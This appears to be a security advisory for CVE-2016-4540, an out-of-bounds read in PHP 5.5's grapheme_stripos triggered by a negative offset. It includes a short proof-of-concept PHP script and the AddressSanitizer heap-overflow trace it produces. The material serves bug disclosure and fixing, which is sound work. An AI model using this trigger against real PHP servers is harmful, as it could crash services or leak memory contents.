PHP 5.5.34 Out-of-bounds reads in zif_grapheme_stripos with negative offset

2016.05.06
Credit: fernando
Risk: Low
Local: Yes
Remote: No
CVE: CVE-2016-4540
CWE: N/A

Description: ------------ Run with PHP/ASAN The offset parameter reads from arbitrary memory when a negative value is passed and the first parameter is an array element. Test script: --------------- <?php $vals = [ 1, 1, 1, 1, 1, 1, 1,1, 1, 1, 1, 1, 1, 1,1,1, 1, 1, 1, 1, 1, 1,1,1, 1,1, 1, 1, 1, 1, 1,1, 1, 1, 1,1,1,1,1, 1,1,1, 1, 1, 1,1,1, 1, 1, 1, 1 , 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,1, 1,1, 1,1,1, 1 , str_repeat("ABCD", 16384) ]; grapheme_stripos($vals[76], "A", -201); Expected result: ---------------- no crash Actual result: -------------- ==16765==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb0ebf747 at pc 0xb71b3c35 bp 0xbff95058 sp 0xbff94c2c READ of size 202 at 0xb0ebf747 thread T0 #0 0xb71b3c34 (/usr/lib/i386-linux-gnu/libasan.so.2+0x37c34) #1 0xaf8e42c5 in zend_memnstr /home/fmunozs/phpgit/php56/Zend/zend_operators.h:280 #2 0xaf8e42c5 in zif_grapheme_stripos /home/fmunozs/phpgit/php56/ext/intl/grapheme/grapheme_string.c:222 #3 0x9a7c718 in zend_do_fcall_common_helper_SPEC /home/fmunozs/phpgit/php56/Zend/zend_vm_execute.h:558 #4 0x9640316 in execute_ex /home/fmunozs/phpgit/php56/Zend/zend_vm_execute.h:363 #5 0x9a6c9c8 in zend_execute /home/fmunozs/phpgit/php56/Zend/zend_vm_execute.h:388 #6 0x9470b59 in zend_execute_scripts /home/fmunozs/phpgit/php56/Zend/zend.c:1341 #7 0x91acc6b in php_execute_script /home/fmunozs/phpgit/php56/main/main.c:2613 #8 0x9a8648a in do_cli /home/fmunozs/phpgit/php56/sapi/cli/php_cli.c:994 #9 0x808a502 in main /home/fmunozs/phpgit/php56/sapi/cli/php_cli.c:1378 #10 0xb6d61645 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18645) #11 0x808aaba (/home/fmunozs/phpgit/php56/sapi/cli/php+0x808aaba) 0xb0ebf747 is located 185 bytes to the left of 262144-byte region [0xb0ebf800,0xb0eff800) allocated by thread T0 here: #0 0xb7212d06 in malloc (/usr/lib/i386-linux-gnu/libasan.so.2+0x96d06) #1 0x92e8597 in zend_mm_mem_malloc_alloc /home/fmunozs/phpgit/php56/Zend/zend_alloc.c:287 SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 ?? Shadow bytes around the buggy address: 0x361d7e90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x361d7ea0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x361d7eb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x361d7ec0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x361d7ed0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x361d7ee0: fa fa fa fa fa fa fa fa[fa]fa fa fa fa fa fa fa 0x361d7ef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x361d7f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x361d7f10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x361d7f20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x361d7f30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==16765==ABORTING

References:

https://bugs.php.net/bug.php?id=72061


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top